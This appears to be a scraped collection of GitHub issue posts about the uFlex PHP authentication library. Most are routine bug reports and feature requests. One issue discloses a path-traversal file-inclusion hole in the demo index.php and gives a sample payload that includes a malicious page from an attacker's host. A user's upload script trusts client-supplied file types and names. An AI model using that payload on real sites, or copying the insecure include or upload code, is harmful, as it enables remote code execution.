ptejada / uflex Goto Github PK

I'm finding that after a little time, $user->isSigned() is returning false, and I think this is due to the user's login session timing out. How do I alter things so that the user stays logged in for longer?

I was trying to update uFlex to password_hash and password_verify and thought I seriously broke things. I set up a new domain with a clean uflex demo install and verified the issue is in the base code.

The change password functions, as seen on /update/password:

• will give "password changed" regardless of actual success
• validation rules are enforced only silently
• if validation rules are not met, password is not changed, but "password changed" success message and redirect occurs
• user believes password is changed, has no way of knowing
• unsure of this one, maybe its because the above is broken or maybe its a security thing, but when changing password with a hash it will act like there is a success with any hash, even invalid or expired. no feedback for user.

I haven't been able to figure out the solution myself yet.

Since this is a soon to be live project, I am placing a bounty of $75 via paypal to whomever fixes this. This is roughly 1/3 my income for this project, so I consider it fair for how much time uFlex saved me.

Thanks in advance.

It is posible to make uFlex compatible with postgres?

When using this method. There is no reset to the actual ability of a user to login using their old password.

Example.
User resets his pass
User logs in using his old pass

If a password is reset I would assume that the function pass_reset, should just wipe the current password field. I feel that is a better option than setting activation back to 0.

What do you think?

Hey bro, still using uFlex in my framework (https://github.com/APlusDesign/Website-Framework) and a few companies are wanting to use it for their staff, but I've had a long standing problem that I need you to look into before I can hand it over.

Everything works great on a PC, using Wamp/php 5 etc, but we keep getting an error on macs.

When we try to register a user via uFlex we get "New User Registration Failed". I have tested throughout my framework that I can insert a user from any point using basic MySql commands with no issue (not using uFlex methods), I also know that uFlex can read from the database because all other functions like username uniqueness are working so I know it has the right DB settings. I must stress again, it only fails when trying to register a user via

$data = array (
'username' => $_REQUEST['username'],
'password' => $_REQUEST['password'],
'password2' => $_REQUEST['password2'],
'email' => $_REQUEST['email']
);
$user->register($data,true);

On the mac these are the environment variables

Server version: Apache/2.2.22 (Unix)
Server built: Aug 24 2012 17:16:58
mysql-5.6.10
PHP 5.3.15

which always produces "New User Registration Failed"

I tried to debug it myself but failed, have you got any ideas?

Hi there,

I started using uFlex tonight, and I have run into a bug. It took me ages to track it down, but I did. Take a look at this line in your main php file. You use rowCount() to check whether a statement has returned rows.

Now read this quote from here:
"If the last SQL statement executed by the associated PDOStatement was a SELECT statement, some databases may return the number of rows returned by that statement. However, this behaviour is not guaranteed for all databases and should not be relied on for portable applications."

I ran into this error when testing out your code. I tried to create a test user, and it worked! But it created duplicates of the user every time I ran the script, instead of returning errors. It turns out that most database implementations don't return rows 'affected' by a SELECT. I have been passing my own (sqlite) connection to uFlex. It makes sense that you didn't get to this in your own testing.

I'll be making some changes to your code to get it to work for me. If you like I can make a pull request when I'm done.

Cheers,
Scott.

NOTE: If a signed user needs to register a new user
use the User::manageUser() function to create a new user
object which then can then be use to register a new user.

How exactly does this work, can you provide example?

Would be good to change the UserBase class to get a fresh copy of Users row on each instatiation

Broken by Commit b1ed337. I have a fix, attempting my first pull request now...

The register function in the user class will NOT hash the password if the array key is lowercase. At first I thought it didn't support hashing until I noticed the documentation said that it did hash passwords. Upon reviewing the code I noticed that the following lines in Users.php expect a capitalized password key (ex. Password instead of password).

User.php

//Hash Password
if ($info->Password) {
        $info->Password = $this->hash->generateUserPassword($this, $info->Password);
}

It saves to the database just fine giving the lowercase version to register, but is plain text instead of a hash. Oops.

Status

The 1.0 release is under development. While the class will be a completed overhaul, its functionality will remain the same or very similar.

Goal

For the 1.0 release im aiming for a more modular and testable design, moving away from squeezing everything into a single file and class. The release should be compatible with the popular PHP dependecy manager composer. The class and all its components should be properly namespaced and compatible with PSR-2 and PSR-4 standards.

While there will still be a single main user object, this main object will be internally subdivided into smaller more manageable classes.

Why?

Is what makes sense to keep the project current, future proof and be easier to ingrate in today's projects which most likely autoload classes and integrated other third parties libraries or framework.

Getting Involved

Any ideas, questions or suggestions can be posted on this thread. I'll keep the new development branch https://github.com/ptejada/uFlex/tree/1.0-DEV up to date with the current progress. Suggestion, collaboration and pull requests are welcome.

Hi,
Please add support for three password fields Current password,New and Confirm
Thanks

Hi!
I'm building a website with uflex base, and I can't upload files with the version 1.0
I'm using page & ps folders. I have a form at page folder wich calls ps php file, and this file doesn't recieve the $_FILE variable. If I use the same form outside the structure of uFlex writting the absolute path at address bar, ps php recieve the $_FILE and works perfectly.
Then I supouse there is something at the uFlex structure that overwrite my $_FILE array. But I didn't find out. The point is $_POST["test"] is recived but $_FILE no.
May I get some help?
Here we have my page/new_campaign.php

<div class="row">
    <div class="col-sm-6 col-sm-offset-3">
        <h2>New campaign</h2>
        <hr/>   
        <form action="ps/new_campaign.php" method="post" enctype="multipart/form-data">
            <div class="form-group">
                <label>test:</label>
                <input type="text" name="test" id="test" class="form-control"><br>
            </div>
            <div class="form-group">
                <label for="file">Filename:</label>
                <input type="file" name="file" id="file"><br>
            </div>
            <input type="submit" name="submit" value="Submit" class="btn btn-primary">
        </form>
    </div>
</div>"

And here we have my ps/new_campaign.php

<?php
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);

if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 20000)
&& in_array($extension, $allowedExts)) {
    if ($_FILES["file"]["error"] > 0) {
        $varEcho = "Return Code: " . $_FILES["file"]["error"] . "<br>";
    } else {
        $varEcho = "Upload: " . $_FILES["file"]["name"] . "<br>";
        $varEcho.= "Type: " . $_FILES["file"]["type"] . "<br>";
        $varEcho.= "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
        $varEcho.= "Temp file: " . $_FILES["file"]["tmp_name"] . "<br>";
        if (file_exists("../upload/" . $_FILES["file"]["name"])) {
            $varEcho.= $_FILES["file"]["name"] . " already exists. ";
        } else {
            move_uploaded_file($_FILES["file"]["tmp_name"],"../upload/" . $_FILES["file"]["name"]);
            $varEcho.="Stored in: " . "upload/" . $_FILES["file"]["name"];
        }
    }
} else {
  $varEcho = "Invalid file";
}

echo $varEcho;
?> 

This is a good question. Where is User::activate()?

windows 8.1, chrome ver 48.0.2564.116 m
Chrome dev console said:

`Uncaught TypeError: button.button is not a function(anonymous function)

@ main.js:6jQuery.event.dispatch

@ jquery.js:4732elemData.handle

@ jquery.js:4544`

The browser said (url: public/ps/login.php):

{"error":[],"confirm":"You are now login as madaras<\/b>","form":[]}

Its generated in chrome only at login, password change and password reset.

Firefox and IE has no error at all.

what am i doing wrong?

I am able to reproduce (not very easily) a general error when my user login a couple of times in a row (because of page reloading).

Basically it appears that a fetchAll is called on an UPDATE query (which is not supposed to happen).

Flow :
login() calls LogLogin() which calls runQuery() with $arguments not being false
the request is quite simple: UPDATE _table_ SET LastLogin=:stamp WHERE ID=:id

Line 193 in DB_Table :

        // If there are no arguments, execute the statement
        if (!$arguments) {
            $stmt->execute();
        }

        $rows = $stmt->rowCount();
        $rows = ($rows > 0) ? $rows : count($stmt->fetchAll());

Trace :

PHP Fatal error:  Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error' in /var/www/default/tools/vendor/ptejada/uflex/src/DB_Table.php:202
Stack trace:
#0 /var/www/default/tools/vendor/ptejada/uflex/src/DB_Table.php(202): PDOStatement->fetchAll()
#1 /var/www/default/tools/vendor/ptejada/uflex/src/User.php(295): ptejada\\uFlex\\DB_Table->runQuery('UPDATE _table_ ...', Array)
#2 /var/www/default/tools/vendor/ptejada/uflex/src/User.php(96): ptejada\\uFlex\\User->logLogin()
#3 /var/www/default/lib/classUFlex.php(15): ptejada\\uFlex\\User->login('', '', false)
#4 /var/www/default/tools/vendor/ptejada/uflex/src/User.php(279): classUFlex->login()
#5 /var/www/default/modules/header/header.php(7): ptejada\\uFlex\\User->start(true)
#6 /var/www/default/lib/classExecuter.php(78): header->__construct(Object(Executer), Object(Smarty))
#7 /var/www/default/lib/classExecuter.php(36): Executer->loadModules()
#8 /var/www/default/lib/classCore.php(443): Executer->__construct(Object(Smarty), Object(classLanguages), Object(PDO),  in /var/www/default/tools/vendor/ptejada/uflex/src/DB_Table.php on line 202

The example demo/index.php does not validate the page variable sent from the client. This means that arbitrary scripts could be included.

If the page included were to have .. in the path, files in parent directories can be included (this can cause unintended execution of other php scripts on the system).

On some systems this could even be exploited remotely (Consider a system with autofs enabled by default, with /net as a dynamic mount point -- as is the case on RHEL) and a site where this index.php lives under /var/www. An attacker could send a page=../../../net/attackerdomain.com/share/myMaliciousPage , which would be translated to page/../../../net/attackerdomain.com/share/myMaliciousPage.php .

The example should be changed to white-list valid characters coming from the client.

Features to implement:

• Automatically expires the session after a period of time without been accessed.
• Add support for PHP 5.5 password_* functions.
• Add backward compatibility to PHP 5.3 and 5.4 for password_* functions.
• Update the default password complexity.
• Review the included demo for security improvements.
• Refactor the built-in errors and handlers.
• Decouple the bundle demo into its own project

Original request #38

On changing the password, if the new password is the same as the old one, it should throw up and error instead of the password not changed error. Will make a PR if i can do it soon or else just a proposal.

This may be by design, but the behavior has changed since I updated from 1.x

If a user hits login and the POST fields or in this case REQUEST, are empty, the $user->log->getErrors() array is empty

$username   = $this->check_input($_REQUEST['username']);   // username = ""
password    = $this->check_input($_REQUEST['password']);    // password = ""
$auto       = (isset($_REQUEST['auto']) ? $_REQUEST['auto'] : 0 );  
$user->login($username,$password,$auto);

It used to produce an error if the password or user fields were empty, now it does not, is this by design or just something that got missed?

Also No I don't check it client side, as it's a simple transport method dealing with these requests all validation logic happens behind the scenes, some of which ie for login,, I used to rely on the $user class to produce the correct error for me, now just an empty array.

Hi,

Can you please also provide the demo app so we could see it all working together.

Thanks

I've made some improvements to the security of uFlex, both in the core files and the demo:

• filtering get/post arrays
• timeout session after X minutes of inactivity
• recaptcha for login/register/forgot password
• switching to PHP's password_hash and password_verify for password storage
• password complexity (min length, cant contain username, compare to list of common pass, require upper/numeric/symbol)

A lot of it is just jammed in for my use, but I could clean some of it up and PR it if you were at all interested.

For most of them we would want them to be opt-in, for example changing hash methods would obviously invalidate all passwords in an upgraded DB. I suppose the best place to put these options would be config.php. Only thing is I'm new to OOP so I'm not sure the best way to store the options and don't want to mess up your coding style.

Hi I've tried to register user and I find out that, the script allows me to create same non-unique users, I found the problem lines in code:
From:

if ($info->Password) {
            $info->Password = $this->hash->generateUserPassword($this, $info->Password);
        }

        //Check for Email in database
        if ($info->Email) {
            if ($this->table->isUnique('Email', $info->Email, 16)) {
                return false;
            }
        }

        //Check for Username in database
        if ($info->Username) {
            if ($this->table->isUnique('Username', $info->Username, 17)) {
                return false;
            }
        }

To:

 if ($info->password) {
            $info->password = $this->hash->generateUserPassword($this, $info->password);
        }

        //Check for Email in database
        if ($info->email) {
            if ($this->table->isUnique('Email', $info->email, 16)) {
                return false;
            }
        }

        //Check for Username in database
        if ($info->username) {
            if ($this->table->isUnique('Username', $info->username, 17)) {
                return false;
            }
        }

And everything worked like a charm;

Hi,
is there any way to disable Guess. It happen when user try with "spacebar" or 0
Thanks

Hello,

I've installed your class throught Composer.
My user has been created without problem via register().
But I cannot login with the good username and password (in clear).

It's the good login and password and I print the post values and it's the same.
How can I debug that ?

Error : Wrong username or password

$user = new Login();
$user->logout();
$user->login($_POST['username'],$_POST['password'],false);
if($user->isSigned()){
        echo "User Successfully Logged in";
    }else{
        foreach($user->log->getErrors() as $err){
          echo "Error: {$err} 
";
      }
    }

Thanks

Activation errors (errors 8,9,14) are not showing on the login screen.

Example:
Trying an incorrect login and password, you get an inline error message that there is an error and why.

Trying to login to an account that has yet to be activated, you get no error message at all. Unclear why to the user.

I don't know how to use Github or do a Pull request at all, but here is the solution. The formError log function is not being called for these errors.

In User.php, lines 182-199 are currently this:

            //If Account is not Activated
            if ($userFile->Activated == 0) {
                if ($userFile->LastLogin == 0) {
                    //Account has not been activated
                    $this->log->error(8);
                } else {
                    if (!$userFile->Confirmation) {
                        //Account has been deactivated
                        $this->log->error(9);
                    } else {
                        //Account deactivated due to a password reset or reactivation request
                        $this->log->error(14);
                    }
                }
                // Remove the signed flag
                $this->session->signed = 0;
                return false;
            }

Update them to this:

            //If Account is not Activated
            if ($userFile->Activated == 0) {
                if ($userFile->LastLogin == 0) {
                    //Account has not been activated
                    $this->log->error(8);
                    $this->log->formError('Password', $this->errorList[8]);
                } else {
                    if (!$userFile->Confirmation) {
                        //Account has been deactivated
                        $this->log->error(9);
                        $this->log->formError('Password', $this->errorList[9]);
                    } else {
                        //Account deactivated due to a password reset or reactivation request
                        $this->log->error(14);
                        $this->log->formError('Password', $this->errorList[14]); 
                    }
                }
                // Remove the signed flag
                $this->session->signed = 0;
                return false;
            }